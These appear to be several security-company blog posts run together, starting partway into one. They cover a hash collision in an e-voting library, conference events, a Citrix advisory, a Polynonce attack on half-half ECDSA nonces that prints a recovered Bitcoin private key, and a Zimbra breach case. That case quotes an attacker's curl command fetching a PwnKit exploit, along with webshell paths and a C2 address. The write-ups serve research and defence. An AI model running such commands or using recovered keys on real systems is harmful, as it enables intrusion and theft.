step = 2538118759407973171811146791368667131241954935495059548630024689747655732678862557749208435969481107380814459665436536211726574891524612823116096131054900164615638966852739602583479562164823495846089556214653879414974498552902588208831350530871038078848054972266771595210321852709605285281094527904412339617311242945847373101364946953130610527817606716680070281102317872706055312245578016183191827376346092632337077166213335586307634755713948460350175685675452215190746056089690264045459643653603216880954927389434235673870858140902530600337552548992841814248314799389339609146507565655896887086919578297478830437457503474171229695140636541060083558747685412094825488085333353282723017400668288679218497723786307591379551476639363407409861045564065248885305686707532686471051481169924771998589593761370455327660724258467435909252074202410183923893361380423652361294929074328945703188531669087036325745880447022845110306798617
v2 = [step, v]
h2 = recursive_hash_zq(q, v2)
print(h1 == h2)We chose v to be a message used in the tests of the library encoded in Base64 and the step value is an intermediate step we have found from the first computation of the hash h1 from the function recursive_hash_zq. Then, we obtained a second hash h2 from a different input [step,v] which collides with the first hash. Thus we have the same problem here as before. This problem has been reported to Swiss Post and have been patched quickly. Now, the function use a XOF to hash the value to and integer between
![[0,2^{\log_2(q)+256}]](https://cdn.prod.website-files.com/67711be5796275bf61eaabfc/685923a3be396e651b30e954_latex.png)
and then reduce it modulo

. There is still a bias as explained before but it is a bias of order

which is too small to be exploited and coherent with the level of security of the whole system. This method is described in the IETF Draft Hashing to Elliptic Curves with the method called hash_to_field and in “Appendix B—Hashing into a Range (Informative)” of the SHA-3 Derived Functions specifications..
This problem have also be found in the Kyber Crypto Library for Go during our audit of the timelock encryption. It has been corrected with a solution described after. This is also used in the Classic McEliece public-key cryptosystem to generate a private key. In this case a 256-bit seed is used to generate the private key which is much larger. If such generation fails, the seed is hashed again until the private key is properly generated. It means that different seeds will generate the same private key at the end. However this issue have been found not harmful by the Classic McEliece team since it reduces only the entropy of the private key to 254 bits.
The previous “Hunt-and-Peck” method can be implemented in a more robust way. For example, the BLS signature uses an algorithm called MapToGroup to map a message to a point of an elliptic curve subgroup. It is defined as followed:

Basically a hash value is computed from the message M and the iteration number i until a valid point on the elliptic curve is found. Since the iteration number is concatenated with the message, this prevents a second pre-image attack as before. However, the iteration number has to be encoded on I bits otherwise the previous problem of domain separation may arise. This construction works and is proven to be secure in the random oracle model in the paper.
However, this approach is not constant time since the total number of iterations depends on the message to hash, and it may lead to timing attacks. For example, the Dragonfly handshake used by WPA3 uses this way of mapping a password to an elliptic curve point. This lead to side channel leakage of the password used to authenticate a client on a WiFi network. This is why the usage of Hunt-and-perk method is not recommended by the IETF draft.
Getting a uniformly distributed value in a specific range from a hash function can be tricky and often, custom solutions have flaws leading to insecure constructions. If you need to implement such methods, a constant time solution to hash value to a finite field is to use the method called hash_to_field defined in IETF draft “Hashing to Elliptic Curves”. To hash values to group of elliptic curve points the solution defined in the same IETF draft is a good option. To obtain hash results in a more complex set the MapToGroup solution with the iteration hashed together with the value is an option but this construction may suffer from timing attacks, depending on the security context.
I would like to thank Nils Amiet and Pascal Junod for their valuable comments on this blog post.
We are a few weeks away from Black Hat and DEF CON. As everyone prepares their travel for the annual trek out to the desert, we wanted to let you know about a few presentations and events our team is participating in across both these two cool cybersecurity venues. We are bringing our expertise in multiple disciplines, including AI security, privacy, and cryptography, and sharing what we’ve learned with you. So, mark your calendars and join us.
Event: Black Hat
Date: Wednesday, August 9th. 11:00am – 1:00pm
Location: Beach Bungalow at the Moorea Beach Club Deck (Mandalay Bay)

We kick off the week with a discussion around some of the hottest technology topics. This is a meet and greet with Senior Cryptography and Quantum Security Expert Tommaso Gagliardoni and Senior Director of Research and Black Hat’s AI, ML, and Data Science track lead Nathan Hamiel. Join us for some food and drinks as well as a casual conversation about security and emerging technology. These are rapidly advancing fields, and we can help by sharing our perspectives and answering your questions.
Event: Black Hat
Date: Wednesday, August 9th. 3:20pm – 4:00pm
Location: South Pacific I, Level 0

AI Security has become an incredibly hot topic with no shortage of challenges and open problems, leaving security professionals scrambling to catch up with emerging techniques and very little to go on. While the slow-moving machinery of industry does its best to catch up, that doesn’t help the many who face these challenges today. Where do you start? What can you do? What have you seen work?
Join Senior Director of Research and Black Hat Review Board member Nathan Hamiel along with Senior Researcher Vishruta Rudresh, for a community conversation on the hottest topic in tech and the resulting challenges. We’ll discuss challenges, solutions, and open problems in this evolving space. This is a community meetup event, so meet your peers, share your perspective, and be part of the conversation. I hope we can have a discussion on how we as a community can tackle these challenges, and all perspectives are welcome. Looking forward to the conversation.
More information is available here.
Event: Black Hat
Date: Thursday, August 10th. 1:30pm – 2:10pm
Location: Oceanside A, Level 2

This year witnessed AI hype hitting unprecedented levels, and if you believe the press, no industry is safe, including the security industry. It may be obvious that hype-fueled, rapid adoption has negative side effects, but when article after article claims if you don’t use AI, you’ll be replaced, the allure can be hard to ignore. Adding to this, there are privacy concerns, proposed regulations, legal issues, and a whole pile of other challenges. So, what does all of this mean for security?
Join Nathan Hamiel along with other industry experts for a grounded conversation where we puncture the hype and focus on the realities of AI affecting security professionals. We discuss the impact of generative AI on the security industry, its risks, the realities, and what you need to know to travel the road ahead.
More information is available here.
Event: DEF CON Demo Labs
Date: Friday, August 11th. 12:00pm – 1:55pm
Location: Unity Boardroom, Caesar’s Forum

Shufflecake is a FOSS tool for Linux that allows creation of multiple hidden volumes on a storage device in such a way that it is very difficult, even under forensic inspection, to prove the existence of such volumes without the right password(s). You can consider Shufflecake a “spiritual successor” of tools such as TrueCrypt and VeraCrypt, but vastly improved: it works natively on Linux, it supports any filesystem of choice, and can manage multiple nested volumes per device, so to make deniability of the existence of these partitions really plausible.
Join Senior Cryptography Expert Tommaso Gagliardoni and former Master’s student on the Kudelski Security Research Team Elia Anzuoni as they push the envelope forward, bringing stronger privacy to vulnerable groups.
Event: DEF CON
Date: Saturday, August 12th. 5pm
Location: Track 2

ECDSA is a widely used digital signature algorithm. ECDSA signatures can be found everywhere since they are public. In this talk, we tell a tale of how we discovered a novel attack against ECDSA and how we applied it to datasets we found in the wild, including the Bitcoin and Ethereum networks.
Although we didn’t recover Satoshi’s private key (we’d be throwing a party on our private yacht instead of writing this abstract), we could see evidence that someone had previously attacked vulnerable wallets with a different exploit and drained them. We cover our journey, findings, and the rabbit holes we explored. We also provide an academic paper with the details of the attack and open-source code implementing it, so people building software and products using ECDSA can identify and avoid this vulnerability in their systems. We’ve only scratched the surface, there’s still plenty of room for exploration.
Join Lead Prototyping Engineer Nils Amiet and Principal Cryptographer Marco Macchetti for an exploration into this attack and how you can ensure these issues don’t surface in your products.
We have lots going on and will be out in Vegas for the week attending multiple events scattered across Both Black Hat and DEF CON. We’d love to meet you. Please don’t hesitate to reach out. Enjoy Vegas and we’ll see you there!
Written by Eric Dodge and Harish Segar of the Kudelski Security Threat Detection & Research Team
Citrix recently released a handful of vulnerabilities, for cross-site scripting, privilege escalation, and unauthenticated remote code execution. These target Citrix ADC (NetScaler ADC) and Citrix Gateway (NetScaler Gateway). All three have existing prerequisites for proper execution, with the most concerning being the remote code execution. Due to its more trivial requirements for execution, and not requiring authenticated access or user interaction. The vulnerabilities are scored as follows: XSS 8.3, Privilege Escalation 8, Unauthenticated RCE 9.8.
Currently, there is no proposed workaround, but it is advised to patch any impacted systems as CVE 2023-3519 exploitation has already been observed.
ProductAffected VersionsFixed versionsNetScaler ADC and NetScaler Gateway13.1 before 13.1-49.13 13.1-49.13 and later releasesNetScaler ADC and NetScaler Gateway13.0 before 13.0-91.13 13.0-91.13 and later releases of 13.0NetScaler ADC13.1-FIPS before 13.1-37.15913.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS NetScaler ADC12.1-FIPS before 12.1-65.36 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS NetScaler ADC12.1-NDcPP before 12.65.36 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP
Additionally, this only applies to impacted systems managed by customers, it does not impact Citrix managed cloud services or adaptive authentication.
The RCE vulnerability, when executed properly, allows for potential execution of remote code while unauthenticated. The only requirements are that the impacted appliance must be configured as either a gateway or an AAA virtual server. In terms of the gateway, possible configurations include VPN virtual servers, ICA proxies, CVPN’s, and RDP proxies. The vulnerability targets a failure to control generation of code, IE code injection. This is typically possible when the product insufficiently filters the control-plane code from the user-controlled input, or the data plane, resulting in an attacker being able to craft specific code that alters the control flow. That in turn leads to the potential for arbitrary code execution.
The XSS vulnerability released has more stringent requirements in order to be effective. It hinges on a user navigating to a browser link that is in the control of the attackers. Additionally, this requires the victim to have connectivity to the NSIP. This vulnerability is based on improper input validation. Leading to potential malicious inputs to be utilized in order to alter control flow, arbitrary control or a resource, or arbitrary code execution.
The privilege escalation vulnerability requires authenticated access to either the NSIP or SNIP, to include access to the management interface. This means it requires an additional vector for initial access in order to be successful. Proper privilege management and monitoring can assist in detecting and preventing this from occurring.
Kudelski Security recommends identifying, validating, and implementing a security update for any affected systems as soon as possible. Administrators should move fast and implement the patch as soon as possible.
The CFC will continue to keep up to date with this vulnerability to provide further updates as they become available.
Public blockchains have a long history of attacks regarding their ECDSA signatures. Since all transactions are publicly available, it makes a perfect experimental field for cryptography attacks. A lattice attack has been recently published under the name “The curious case of the half-half Bitcoin ECDSA nonces” and experimented against Bitcoin. As a Swiss team loving the half and half cheese fondue, we had to investigate such attack. We discovered that our previous attack, “Polynonce“, is also applicable to this way of generating ECDSA nonces. We explain how in this post and show the results we obtained compared to the paper.
To sign a message, ECDSA uses a value called a nonce. The nonce has to be randomly generated and unique for each message to be signed. For the Bitcoin and Ethereum secp256k1 curve, typical nonce values look like:
0x23fcec8739ec6612ac802e0b5529ec7dc34bed8e994e8019c66d30d961801cc8
0xdc2b71ec23803bdeda72fc10c6a7033a6b23d01c9f6560647c2c4cd91262adc1
0xc628cace75fcfa8c0a0cd18639b7af14e1194d9fffe999ee139b898b701c46e0
0x45b431b3bb8ed7e84209d99f529bc59555fa33c896d22a88b3301e08d3478694
ECDSA has a well-known and well-studied common pitfall, namely, nonce reuse. As its name suggests, if a nonce is ever reused for different signatures, the private key can be recovered from those signatures; then obviously, the first attack applied to blockchains was the nonce reuse attack. As soon as two different messages have been signed with the same nonce, the private key is compromised. This problem is usually solved by generating deterministic nonces following RFC 6979.
However, ECDSA nonces are so critical that even bias in their generation leads to private key recovery. Thus, more clever attacks were later applied to public blockchains involving lattice attacks. Those attacks allowed recovery of nonces that are shorter than expected, with lengths 64, 110, 128, and 160 bits. For example, nonces generated like the following are vulnerable to lattice attacks:
0x0000000000000000000000000000000010c361aa85f453d667fbb7d320576ea9
0x00000000000000000000000000000000a95d25b18bb61df61f328e0a91c9d53e
0x00000000000000000000000006afcace4e73a45bb0d98b3d25e7ba49b8b4cbbe
0x00000000000000000000000088b58851f592bc1782378fbc162c42b91ef52d16
The smaller the nonce is, the smaller is the dimension of the lattice used for the attack, and the smaller is the number of signatures needed to have a successful attack. According to the “Bias nonce sense” paper, two signatures with 128-bit nonces and a 3-dimensional lattice give a 75% probability of success (key recovery). From three signatures with 170-bit nonces and a 4-dimensional lattice, we get a 95% probability of success, and so on. A variant of the attack also applies to the discovery of nonces with shared prefixes and suffixes. For example, nonces generated like the following are also vulnerable to the previous attacks as well as common-suffix constructions:
0xc25f1a2a398cf22f20c08eda2457930114792ddbafe16f1866c3a9ce28aeaa150xc25f1a2a398cf22f20c08eda24579301263f58f69740fb6d928ae40fe38ebfd0
Another way of attacking ECDSA is by assuming an algebraic relation between the nonces. This approach was proposed by our team with the Polynonce attack. It assumes a polynomial relation between consecutive nonces

and

for unknown coefficients

of the form:

or

Then the Polynonce attack is able to recover the private key algebraically with a 100% success probability but it needs 4 signatures in the linear case, 5 for the quadratic case and so on. The attack mainly relies on solving polynomial equations and thus is very fast compared to lattice attacks. For more details, this attack will be presented at the upcoming DEFCON conference.
All the previous attacks work with at least two different signatures from the same private key. However, some wallets like Ledger sign transactions with a single private key and then change it. This would explain why nowadays a lot of bitcoin public addresses are used only once. Here is a log scale plot of the dump of bitcoin (until block 752759 on September 5, 2022) limited to P2PKH transactions:

This shows that 92% of the public keys that are used for P2PKH transactions are only used once. This feature was mainly introduced to protect privacy but indirectly it also protect against the previous attacks. For Ethereum, the landscape is a bit different. We have analyzed 1759432087 signatures from 151429561 unique keys and we have made the linear scale plot:

This is quite different: 42% of public key are used for a single signature, 22% for two, 13% for three and so on. Thus, it seems that the usage of privacy preserving method is less deployed or applicable to Ethereum.
Recently, a new attack presents results when the nonces are generated from the upper half of the message hash concatenated with the upper part of the private key. Meaning that the nonce

can be written as:

The novelty of such attack is that it allows recovery the secret key

from a single signature. Similarly to previous lattice attacks, the expression for

can be injected in the ECDSA formula, rearranged to form an instance of the Hidden Number Problem. Then this instance is solved with the BKZ algorithm. This technique is very powerful, as a single signature is sufficient and allows the attack to be applied on transactions issued by private keys used only once. The optimized version of the attack is able to recover a private key with a 99.99% success rate in 0.48 seconds. This is quite powerful but it took the authors 49 cpu-years to run the attack on the Bitcoin blockchain.
While reading the new half-half attack, we figured out that Polynonce can also be adapted to recover such private key when used with half-half nonces. From an ECDSA signature

, a message hash

and a private key

we have the following relation for the nonce:

If we have two nonces

and

generated with the previous half-half formula, if we take the difference we get:

We have found a linear equation on

with all other values known. It gives a very fast way of solving the equation and recovering the private key

. However, with Polynonce, two nonces and thus two signatures from the same private key are required. We have lost a big advantage w.r.t the previous attack. Nevertheless, since this attack variant is very fast, it may be applied first on public keys having multiple signatures and then the lattice attack can be applied on the remaining signatures.
Since the nonce difference in our equation depends only on

, it allows us to recover all the nonces which were generated with the formula

where

is a (secret) constant. It is a bit more generic, but a slight complication happens for Bitcoin. From an ECDSA signature

the different signature

is also valid for the same message. As Bitcoin rejects the signature which has the largest

value to avoid signature forgery, this has the drawback that we have to compute with both

and

. Thus in our attack we have to guess the sign of each nonce.
This construction should have been also discovered by the previous lattice attacks on shared suffixes but only with 75% chance of success.
We have run the analysis on the Bitcoin blockchain dump that we have used in our previous analysis (up to block 752’759 on September 5, 2022). We analysed 34 million public keys with at least 2 signatures. It took 10m23s on a 16-core AMD with 2.7 GHz clock.
We were able to find and recover 110 unique private keys. For example the transactions f3151fc1b29c117f1e4b67045b2d2901e7c289f596c242d7de123243fb623981 and f7bf1edf9d9cefa8421322c53bb00ecf118f99489171da72a9c11cf8d02b65f8 from the address 18zg6FG5pu8Bpq73L54AYvB8phTw3qCCR7 use the half-half method to generate nonces. Our script was able to recover the private key of that address:
0x3d6a2f408fe58dabce126718a06a655a4b49625572ab2eb1e9b6e094f11e1832
If we then recompute the nonces for such transactions we obtain:
0xf11a1456d7b0d9d13671f348928a84263d6a2f408fe58dabce126718a06a655a
0x49847dd298858c4ec1c059c11b22b3443d6a2f408fe58dabce126718a06a655a
We clearly see the least significant half of the nonce is equal the most significant half of the private key. However, as explained above, we are able to recover other interesting cases; for the same address we have found two nonces:
0x28c0a0b7399997a379ba83642e210a837d44ada61f63128ff1bff7742fcbdbe7
0x69ee6c0c3f1f477df4ff8b9f272809247d44ada61f63128ff1bff7742fcbdbe7
In this case the private key is not involved, as we rather find another unknown constant. We were also able to confirm the previous findings that some keys using such nonces were small keys:

. Thus keys are easily recovered by bruteforcing, similarly to what has been done on the website https://privatekeys.pw. We did not find accounts with a non-zero balance as for the previous attack and we think that those accounts are monitored by bots and are emptied each time the balance changes.
Since this attack is quite fast, we have also run it on variations of the half-half nonce generation:

,

and

but we did not find additional results.
We have also run the same attack on our Ethereum data set that we gathered during previous attacks. The attack took 49m11 on the same machine. No private keys were recovered with this attack.
It is interesting to see how creative the nonce generation constructions have been made in the past and we wonder if any other exotic constructions exist in the wild. Even though, those new attacks did not recover new private keys it does not mean that other weak nonce generation algorithms have been used for previous transactions and could be recovered by similar methods. If such problems are discovered the best way to protect the funds is to to transfer them at a new address which was not used for transaction before and leave the vulnerable addresses empty. The script of our attack and the results we obtained are available on the Github repository of the Polynonce attack.
Special thanks to my colleagues Marco Macchetti and Nils Amiet, for the original attack, ideas and for contributing to this blog post with fruitful discussions.
In this series, we will be covering recent incident response cases handled by the Kudelski Security Incident Response team (KSIR).
This is not an in-depth technical write up, rather an effort to share concrete recommendations from a specific incident, which will help you improve your readiness in case of a cyber breach.


KSIR was contacted after the client suspected “something didn’t look right” with their Zimbra webmail server in the demilitarized zone (DMZ), which they had been investigating for almost a month.
A quick check revealed the following:

The first action we took was to deploy the EDR agents on the Linux servers. This would give us the visibility and ability to be ready to respond in case the attacker was still in the network or if any super-advanced persistence mechanism had been set.

Two days later, while working on agent deployment, the threat actor did indeed return and we received an alert on the Zimbra server. Throughout the investigation, it would appear the threat actor worked on a schedule: every 4-5 days within working hours between midnight and 5AM UTC+1.
While we suspected that the exposed internet assets were the entry points of attackers, we were able to prove it by piecing the evidence together on a timeline.
After appearing to search for webshells, the attacker received a status code “200” on one of the deployed Java pages /opt/zimbra/jetty_base/webapps/zimbra/public/jsp/Startup3.jsp (see figure 1) and started interacting with it by executing some enumeration commands (see figure 2 – for who is logged on and what they are doing)


The threat actor later checked if any of the other webshells were still present. This gave us a clue as to where the attacker would store the backdoors. The first two commands (shown in Figure 3 below) even showed how the attacker would obfuscate them with different base64 encoding libraries.

After getting hits, the threat actor tampered with the timestamp metadata of the files to hide them more effectively, making them look like they were present at a previous point in time and would go unnoticed if the administrator looked for recent modifications (Figure 4).

Further custom forensics on the host revealed other webshells:
/opt/zimbra/jetty_base/webapps/zimbra/public/jsp/Zimbre.jsp
As the webserver logs don’t go back long enough, proving which CVE was exploited to get foothold on the Zimbra webserver was not straightforward. However, a quick search on the product’s vulnerabilities showed how different Zimbra RCE vulnerabilities had been actively exploited in the wild, especially with server versions that were confirmed to be outdated at the time. See: https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a for details.

Around the time we received the EDR alert for the Zimbra webserver, we got another alert from an internal webserver that indicated a compromised user was attempting to download the following:
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
This is a self-contained exploit for CVE-2021-4034 for local privilege escalation on Linux distributions. We confirmed that the client’s infrastructure was vulnerable.
In order to determine the scope of lateral movement, we started pulling artifacts with sniper forensics on the local webserver as EDR technology is only effective as soon as it is deployed and not useful for investigating past activity.

Following the two alerts, we moved to containment.
At this stage, we have reliable information about the attacker from the two alerts: timeframe, username, and exploitation habits. As the attacker is seen to leverage CVE-2021-4034 whenever they start an ssh session, one way to hunt for this behavior is by looking for the lines below in the auth.log (secure.log) file (figure 5). This correlates positively with the vulnerability exploitation which uses that kit.

This iterative process allowed us to discover that the threat actor was coming from a contractor VNC gateway and leveraging credentials (which we later discovered to be compromised) to try to log into as many hosts as they could, successfully getting into 6 others.
Furthermore, the forensic analysis revealed that a backdoor binary was dropped onto two servers.
The backdoor is successfully detected by many AV engines and is labeled as trojan.linux/rekoobe (figure 6).


Static analysis of the file shows a hardcoded C2 ip: 94.158.247.102 and a connection would be established on port 443 (Figure 7).


While it is theoretically possible that two different threat actors were on the same environment, we wanted to understand how the attacker could move from the mail server to the other hosts.
We confirmed the hypothesis that the compromised user’s cleartext password was sent in an email stored in cleartext on the Zimbra webmail server. Essentially, the client needed to assume that the attacker had access to other sensitive data residing in the emails.
Moving on with the investigation, we were able to determine that the account belonged to an ex-employee of the contracting company who was not properly offboarded.
Their account’s most recent activity occurred during the incident’s timeline. This allowed us to confidently establish the link between Zimbra as patient-0 and the contractor’s VNC gateway as the first host in the lateral movement kill chain.
So, taking a step back for a minute, this is where we’re at:
We understand that the webserver is vulnerable to critical CVEs and that one of them was most likely exploited. While the recommended remediation is to patch the application by updating it, there is insufficient bandwidth on the client’s side to perform such action. Furthermore, there is no tolerance for business disruption and hence isolating the host is out of question.
For this reason, after cleaning up any identified persistence, we suggest temporary mitigations to enable the client to keep the service running. Recommendations are as follows:
We also make it clear that – should something unexpected happen – our Managed Detection and Response and IR services are on hand, 24/7 to help get them out of the situation.
It’s worth pointing out that the client was grateful that we built our investigation around their business needs. Our approach is never cookie-cutter. We always take into account their practical restrictions and operational requirements before building a response.

The compromised Zimbra server was contained and reserved for investigation while the customer worked on starting a fresh image. Unfortunately, the new server was spawned from a compromised snapshot, which allowed the attacker to find a hidden webshell backdoor. This time the attacker directly deleted all user accounts. We believe the act of sabotage was precipitated by the operation being burned.

Fortunately, the client had recent backups. Disruption for users was minor (less than 1 hour downtime) and login was only blocked temporarily before restoration.[MD1] [TG2]
—
In addition to common tactics, techniques, and procedures, the breac in question included more specific ones:
– Initial foothold on a DMZ webserver (Mitre: T1190)
– Lateral movements with insecure credentials (Mitre: T1552.001)
– Leveraging third-party trust (Mitre: T1199)
– Exploitation for privilege escalation (T1068)
– Web Shell backdoors (T1505.003)
– Lateral movement with SSH T1021.004
– Timestomping T1070.006
Click here to download the full case study, including the 8 key takeaways.